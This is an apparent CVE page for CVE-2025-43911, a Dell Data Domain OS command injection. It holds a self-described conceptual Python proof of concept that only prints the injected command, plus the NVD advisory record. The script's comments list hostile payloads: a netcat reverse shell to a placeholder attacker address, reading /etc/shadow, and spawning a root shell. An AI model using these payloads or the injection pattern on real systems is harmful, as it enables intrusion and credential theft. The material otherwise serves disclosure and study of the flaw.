CVE-2025-43911

# CVE-2025-43911 - Dell PowerProtect Data Domain OS Command Injection PoC # Vulnerability: OS Command Injection in DD OS (CWE-78) # Affected: DD OS Feature Release 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0, # LTS2024 7.13.1.0 - 7.13.1.30, LTS2023 7.10.1.0 - 7.10.1.60 # Requirement: Local access + high-privilege account # Note: This is a conceptual PoC demonstrating the injection vector. # Actual vulnerable endpoints/parameters may vary by DD OS version. import subprocess import sys # Simulated vulnerable DD OS CLI command construction # In the real vulnerable code, user input is concatenated directly # into a shell command without proper sanitization. def vulnerable_ddos_command(user_input): """ Simulates a vulnerable function in DD OS that passes user input directly to a shell command (e.g., via os.system or subprocess with shell=True). """ # Example: a DD OS admin command that takes a hostname or path parameter # Vulnerable pattern: f"ddos-admin show-config --target {user_input}" command = f"ddos-admin show-config --target {user_input}" print(f"[*] Executing: {command}") # In real exploitation, this would execute on the target DD OS # subprocess.run(command, shell=True) return command def exploit(target_host, attacker_payload): """ Demonstrates OS command injection by appending shell metacharacters to a legitimate DD OS command parameter. """ print(f"[*] Target DD OS host: {target_host}") print(f"[*] Injecting payload: {attacker_payload}") # Malicious input with command injection via semicolon (;) injected = f"{target_host}; {attacker_payload}" result = vulnerable_ddos_command(injected) # Example payloads for privilege escalation to root: # - "; sudo /bin/bash" # - "; cat /etc/shadow" # - "; id; whoami" # - "; nc -e /bin/bash attacker_ip 4444" print(f"[+] Injected command would execute arbitrary OS commands as root") return result if __name__ == "__main__": target = "localhost" payload = "sudo /bin/bash -c 'id; whoami'" print("=" * 60) print("CVE-2025-43911 PoC - DD OS Command Injection") print("=" * 60) exploit(target, payload) print("\n[!] In a real scenario, this would result in root-level") print(" arbitrary command execution on the DD OS appliance.")

{"cve": {"id": "CVE-2025-43911", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:15:59.843", "lastModified": "2025-10-14T20:12:02.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}